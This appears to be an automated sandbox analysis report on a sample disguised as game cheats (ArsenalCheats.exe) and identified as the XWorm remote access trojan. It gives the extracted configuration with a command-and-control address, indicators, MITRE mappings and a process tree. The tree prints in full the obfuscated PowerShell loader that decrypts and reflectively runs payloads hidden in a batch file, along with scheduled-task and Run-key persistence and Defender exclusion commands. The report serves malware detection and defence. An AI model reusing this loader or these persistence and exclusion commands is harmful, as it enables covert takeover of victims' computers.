xworm | 3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff

Analysis

max time kernel
149s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
19/08/2024, 17:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ArsenalCheats.exe
Size

274KB
MD5

3b328fc362a6459ed7b74bb3b0b824f3
SHA1

8b5cf3e0c26109a67a3832eb7b63c0954d266b9b
SHA256

3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff
SHA512

3c95ee1e07202c1a3580bc4433eb4c1dcb28b22c710d21a2852b6345b13b358e49df74337aff475b8f9df8bf845b18a48374612b1a278f06dfb4b7382c6025cc
SSDEEP

6144:bB5O/3TQG9zULZNv/KOrZTn5ZPUksUflro+CD0l:bBgn9zmZNv/K4ZT5ZP/sU9rjC4

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

147.185.221.22:11860

Mutex

Wn4BW0u57Ed8grMl

Attributes

Install_directory
%LocalAppData%
install_file
Windows Host Proccess.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral4/memory/3312-71-0x0000000006160000-0x0000000006172000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3312	powershell.exe
4	3312	powershell.exe
5	3312	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1732	powershell.exe
4444	powershell.exe
3312	powershell.exe
3880	powershell.exe
1404	powershell.exe
4656	powershell.exe
3440	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3320	Windows Host Proccess

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Proccess"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ArsenalCheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Host Proccess
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2256	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4668	schtasks.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1732	powershell.exe
1732	powershell.exe
4444	powershell.exe
4444	powershell.exe
3312	powershell.exe
3312	powershell.exe
3880	powershell.exe
3880	powershell.exe
1404	powershell.exe
1404	powershell.exe
4656	powershell.exe
4656	powershell.exe
3440	powershell.exe
3440	powershell.exe
3312	powershell.exe
3320	Windows Host Proccess
3320	Windows Host Proccess

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeIncreaseQuotaPrivilege	4444	powershell.exe
Token: SeSecurityPrivilege	4444	powershell.exe
Token: SeTakeOwnershipPrivilege	4444	powershell.exe
Token: SeLoadDriverPrivilege	4444	powershell.exe
Token: SeSystemProfilePrivilege	4444	powershell.exe
Token: SeSystemtimePrivilege	4444	powershell.exe
Token: SeProfSingleProcessPrivilege	4444	powershell.exe
Token: SeIncBasePriorityPrivilege	4444	powershell.exe
Token: SeCreatePagefilePrivilege	4444	powershell.exe
Token: SeBackupPrivilege	4444	powershell.exe
Token: SeRestorePrivilege	4444	powershell.exe
Token: SeShutdownPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeSystemEnvironmentPrivilege	4444	powershell.exe
Token: SeRemoteShutdownPrivilege	4444	powershell.exe
Token: SeUndockPrivilege	4444	powershell.exe
Token: SeManageVolumePrivilege	4444	powershell.exe
Token: 33	4444	powershell.exe
Token: 34	4444	powershell.exe
Token: 35	4444	powershell.exe
Token: 36	4444	powershell.exe
Token: SeIncreaseQuotaPrivilege	4444	powershell.exe
Token: SeSecurityPrivilege	4444	powershell.exe
Token: SeTakeOwnershipPrivilege	4444	powershell.exe
Token: SeLoadDriverPrivilege	4444	powershell.exe
Token: SeSystemProfilePrivilege	4444	powershell.exe
Token: SeSystemtimePrivilege	4444	powershell.exe
Token: SeProfSingleProcessPrivilege	4444	powershell.exe
Token: SeIncBasePriorityPrivilege	4444	powershell.exe
Token: SeCreatePagefilePrivilege	4444	powershell.exe
Token: SeBackupPrivilege	4444	powershell.exe
Token: SeRestorePrivilege	4444	powershell.exe
Token: SeShutdownPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeSystemEnvironmentPrivilege	4444	powershell.exe
Token: SeRemoteShutdownPrivilege	4444	powershell.exe
Token: SeUndockPrivilege	4444	powershell.exe
Token: SeManageVolumePrivilege	4444	powershell.exe
Token: 33	4444	powershell.exe
Token: 34	4444	powershell.exe
Token: 35	4444	powershell.exe
Token: 36	4444	powershell.exe
Token: SeIncreaseQuotaPrivilege	4444	powershell.exe
Token: SeSecurityPrivilege	4444	powershell.exe
Token: SeTakeOwnershipPrivilege	4444	powershell.exe
Token: SeLoadDriverPrivilege	4444	powershell.exe
Token: SeSystemProfilePrivilege	4444	powershell.exe
Token: SeSystemtimePrivilege	4444	powershell.exe
Token: SeProfSingleProcessPrivilege	4444	powershell.exe
Token: SeIncBasePriorityPrivilege	4444	powershell.exe
Token: SeCreatePagefilePrivilege	4444	powershell.exe
Token: SeBackupPrivilege	4444	powershell.exe
Token: SeRestorePrivilege	4444	powershell.exe
Token: SeShutdownPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeSystemEnvironmentPrivilege	4444	powershell.exe
Token: SeRemoteShutdownPrivilege	4444	powershell.exe
Token: SeUndockPrivilege	4444	powershell.exe
Token: SeManageVolumePrivilege	4444	powershell.exe
Token: 33	4444	powershell.exe
Token: 34	4444	powershell.exe
Token: 35	4444	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3312	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 2628	1692	ArsenalCheats.exe	81
PID 1692 wrote to memory of 2628	1692	ArsenalCheats.exe	81
PID 1692 wrote to memory of 2628	1692	ArsenalCheats.exe	81
PID 2628 wrote to memory of 5064	2628	cmd.exe	83
PID 2628 wrote to memory of 5064	2628	cmd.exe	83
PID 2628 wrote to memory of 5064	2628	cmd.exe	83
PID 5064 wrote to memory of 4724	5064	net.exe	84
PID 5064 wrote to memory of 4724	5064	net.exe	84
PID 5064 wrote to memory of 4724	5064	net.exe	84
PID 2628 wrote to memory of 1732	2628	cmd.exe	86
PID 2628 wrote to memory of 1732	2628	cmd.exe	86
PID 2628 wrote to memory of 1732	2628	cmd.exe	86
PID 1732 wrote to memory of 4444	1732	powershell.exe	87
PID 1732 wrote to memory of 4444	1732	powershell.exe	87
PID 1732 wrote to memory of 4444	1732	powershell.exe	87
PID 1732 wrote to memory of 5088	1732	powershell.exe	90
PID 1732 wrote to memory of 5088	1732	powershell.exe	90
PID 1732 wrote to memory of 5088	1732	powershell.exe	90
PID 5088 wrote to memory of 2300	5088	WScript.exe	91
PID 5088 wrote to memory of 2300	5088	WScript.exe	91
PID 5088 wrote to memory of 2300	5088	WScript.exe	91
PID 2300 wrote to memory of 348	2300	cmd.exe	93
PID 2300 wrote to memory of 348	2300	cmd.exe	93
PID 2300 wrote to memory of 348	2300	cmd.exe	93
PID 348 wrote to memory of 1944	348	net.exe	94
PID 348 wrote to memory of 1944	348	net.exe	94
PID 348 wrote to memory of 1944	348	net.exe	94
PID 2300 wrote to memory of 3312	2300	cmd.exe	95
PID 2300 wrote to memory of 3312	2300	cmd.exe	95
PID 2300 wrote to memory of 3312	2300	cmd.exe	95
PID 3312 wrote to memory of 3880	3312	powershell.exe	97
PID 3312 wrote to memory of 3880	3312	powershell.exe	97
PID 3312 wrote to memory of 3880	3312	powershell.exe	97
PID 3312 wrote to memory of 1404	3312	powershell.exe	99
PID 3312 wrote to memory of 1404	3312	powershell.exe	99
PID 3312 wrote to memory of 1404	3312	powershell.exe	99
PID 3312 wrote to memory of 4656	3312	powershell.exe	101
PID 3312 wrote to memory of 4656	3312	powershell.exe	101
PID 3312 wrote to memory of 4656	3312	powershell.exe	101
PID 3312 wrote to memory of 3440	3312	powershell.exe	103
PID 3312 wrote to memory of 3440	3312	powershell.exe	103
PID 3312 wrote to memory of 3440	3312	powershell.exe	103
PID 3312 wrote to memory of 4668	3312	powershell.exe	105
PID 3312 wrote to memory of 4668	3312	powershell.exe	105
PID 3312 wrote to memory of 4668	3312	powershell.exe	105
PID 3312 wrote to memory of 884	3312	powershell.exe	109
PID 3312 wrote to memory of 884	3312	powershell.exe	109
PID 3312 wrote to memory of 884	3312	powershell.exe	109
PID 3312 wrote to memory of 1780	3312	powershell.exe	111
PID 3312 wrote to memory of 1780	3312	powershell.exe	111
PID 3312 wrote to memory of 1780	3312	powershell.exe	111
PID 1780 wrote to memory of 2256	1780	cmd.exe	113
PID 1780 wrote to memory of 2256	1780	cmd.exe	113
PID 1780 wrote to memory of 2256	1780	cmd.exe	113

C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe
"C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\SysWOW64\net.exe
    net file
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      System Location Discovery: System Language Discovery
      PID:4724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_898_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_898.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4444
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_898.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_898.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2300
      - C:\Windows\SysWOW64\net.exe
        
        net file
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:348
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_898.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_898.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Local\Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4668
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF1B9.tmp.bat""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1780
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2256

C:\Users\Admin\AppData\Local\Windows Host Proccess
"C:\Users\Admin\AppData\Local\Windows Host Proccess"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5dc9a9599fb11ee70f9164d8fea15abf

SHA1
85faf41a206f3fa8b469609333558cf817df2cda

SHA256
3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

SHA512
499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
445d995fef18c87f0346d0941211e915

SHA1
bfd1c7f60d35fadda8d465a5a253a3ac0c084721

SHA256
1a6b3d3ed6b5fdf672c935595953c139317b15ef231b0bf33e2d804f85202912

SHA512
bb539e48acb5adcb75ee9f7c8ac73cf5584680a3256805f3e6a0074105606c36ab329abafaea9acb9680aeed2ce5072d3a237941dd5a8eeb88ac9129746fe18f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b5dbd64ac05c540a6fcb11c396858f77

SHA1
8d032a28e7e378e5e322a0a0de160ef435fdf2fe

SHA256
da20cddfabad5d32ada6f6b8b39cfc45f6990e554a4d83d5897ecd1dd655b993

SHA512
ae548d50ac3c2253c9f43ea97be557defa6624f4ed96ed0f6a78a3f699539f324f0aaef0bac03842871d87cfe159caaa8cfb9cd159420bec12b7e8cd2cb42c3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1f902820839b692c08e1fd00006e51d8

SHA1
ec662c5a4d28bfc1c569a296b275f9ed3bf94399

SHA256
b634d7e2346913b5c0a1ead05dcba98875b21d160ae429a7ff1378cf80ef38f1

SHA512
fdf59bd7db687ff1d1a47e9034a5e71f66ed4102ebfc904eecf63a730b0f7ce9c73c9469303d359453ae9316690c4524a086cf887d994600fd309c27068cef34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
60ed00cf484e9b8c3fc35bb6693ef118

SHA1
3b01b204b1f6be8808eed4c6c603cabce3ffaa61

SHA256
8e12bf0d52709e2bf46682ed67ecedcd45f7d770d680a916e7ddaa1d09b68cec

SHA512
9e2d61924e36d917b1a5134d29056db5d31dbc3f62680ea5e2baa1a6e846c5c9feac4b0e6f0a316b7d76e85f22623aee2c7416245968a84ee42ec5b7e864468b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b7997368673902afb6b30bb6c151007c

SHA1
cc70f4141cca3b243f82c841f49909bcd1527a30

SHA256
997ed20f70e15e6b6cdf90d75b66fd51188fde8a76fba2f0b830949775e6575c

SHA512
fe057ff712dece72ce6294c25ef62646548e353d81b65bebce1c58a74a52531ee7a3bf650acc19b2841b089c26e10132da5658bb13188d9b39c41f45a37bf9fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\R.bat

Filesize
270KB

MD5
b351e6715948f802c19611db86cc19ea

SHA1
a8bc001dc8c2e29d78579b7b1acb57be7e4e7f22

SHA256
e2ac8e1289dcd0c61d7bf98688a93bb2031b9fbc796053f965e1d8d311d2ede3

SHA512
07faa4232fca72d8158424d9e220229d0b072c6481f20cead89a07342b3d7037af7d302da23a726df9f90dfe6fad67c2a37f2a909a84852625e549c569a8a2cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tcoc2qye.ma0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF1B9.tmp.bat

Filesize
171B

MD5
6b660c3e1e3bfbf0c4cf2fa36d9bb299

SHA1
9cdf99dbcbef13c9408e638517a469534674fed3

SHA256
f6f6859ef8cb3831b1bf38fdb4d00342668168bf467b49862c8c2ca3441618ee

SHA512
f1d46fce9f3c15a799dc9868445d12248de7f1868c8a085439d3f996455b765ed17dc53993e4975ab2a33a2f94ff6cff221b9c10146c36333d2fd5d4e666c7cc

Download Submit
C:\Users\Admin\AppData\Local\Windows Host Proccess

Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_898.vbs

Filesize
115B

MD5
e92e6c0791fc0e1b6c196d19f0ce8643

SHA1
5b891b017ab4a94e35c4910d4fc6a0227335ab45

SHA256
11d4d046e31b7501015f89decde22b1c97dfb4556138efdf0e40001fc837a5aa

SHA512
8d6a5b474c0dcbe20d08f7e5c69380c0947a054d6bfc1c3613d4e5962d81326e03b17d34b525be932a9eb3233cb5c5598c385372e36fa2d3b07fa9ea3817d494

Download Submit
memory/1404-106-0x0000000070D70000-0x0000000070DBC000-memory.dmp

Filesize
304KB

Download
memory/1732-22-0x0000000007630000-0x0000000007CAA000-memory.dmp

Filesize
6.5MB

Download
memory/1732-6-0x0000000074B80000-0x0000000075331000-memory.dmp

Filesize
7.7MB

Download
memory/1732-24-0x0000000006380000-0x0000000006388000-memory.dmp

Filesize
32KB

Download
memory/1732-25-0x0000000006FF0000-0x0000000007024000-memory.dmp

Filesize
208KB

Download
memory/1732-26-0x0000000007CB0000-0x0000000008256000-memory.dmp

Filesize
5.6MB

Download
memory/1732-4-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/1732-5-0x00000000029F0000-0x0000000002A26000-memory.dmp

Filesize
216KB

Download
memory/1732-10-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/1732-7-0x00000000052C0000-0x00000000058EA000-memory.dmp

Filesize
6.2MB

Download
memory/1732-8-0x0000000005020000-0x0000000005042000-memory.dmp

Filesize
136KB

Download
memory/1732-23-0x0000000006340000-0x000000000635A000-memory.dmp

Filesize
104KB

Download
memory/1732-9-0x00000000051C0000-0x0000000005226000-memory.dmp

Filesize
408KB

Download
